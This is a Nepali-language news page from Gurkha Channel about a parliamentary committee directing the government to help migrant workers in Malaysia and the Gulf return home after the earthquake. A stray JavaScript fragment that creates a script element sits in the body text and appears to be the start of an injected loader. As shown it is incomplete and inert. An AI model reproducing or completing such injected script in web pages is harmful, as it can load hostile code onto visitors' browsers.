अन्तराष्ट्रिय श्रम समिति

admin Avatar

संसदिय समितिले विदेशमा रहेका नेपाली कामदारलाई नेपाल आउने व्यवस्था प्रभावकारी रुपमा अघि बढाउन सरकारलाई निर्देशन दिएको छ। व्यबस्थापिका संसद अन्तर्गत अन्तराष्ट्रिय श्रम तथा सम्वन्न्ध समितिको बिहिवार वसेको बैठकले भूकम्पवाट घर परिवार प्रभावित भएर नेपाल फर्कन चाहेकाहरुले पनि विभिन्न कारण घर फर्कन नपाएको गुनासो बढेको भन्दै यस्तो निर्देशन दिएको हो। समितिले विदेशस्थित नेपाली नियोगहरुसाथै सम्वन्धित म्यानपावर र एजेन्सीहरुलाई समेत परिचालन गरी प्रभावकारी काम गर्न समितिले निर्देशन दिएको छ। बैठकमा सभासदहरुले विशेषगरी मलेसिया तथा खाडी मुलुकमा रहेका कामदार नेपाल फर्कन समस्या भएको विषय उठाएका थिए।

विदेशस्थित नेपाली नियोगकको भूमिका प्रभावकारी नदेखिएको उनीहरुको भनाई थियो। बैठकमाा परराष्ट्र मन्त्री महेन्द्र बहादुर पाण्डेले अहिलेसम्म कति श्रमिक कुन देशमा के काम गरीरेका छन भन्ने विषय स्पष्ट रुपमा एकिन नभएकाले सत्य तथ्याङक आउन कठिन भएको बताउनुभयो। वैदेशिक रोजगारीलाई व्यवस्थित बनाउन सिङगो नीति नियममा नै परिवर्तन आवश्यक रहेको उहाको भनाई थियो। समितिमा भूकम्प पछि स्वच्छिक तथा नियोगका सम्पर्कमा आएर करिव १२ सय नेपाली विभिन्न देशवाट नेपाल फर्किएको जानकारी गराईएको थियो। बैठकमा परराष्ट्र मन्त्री लगाएत श्रम मन्त्री र सचिवहरुको सहभागिता रहको थियो।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories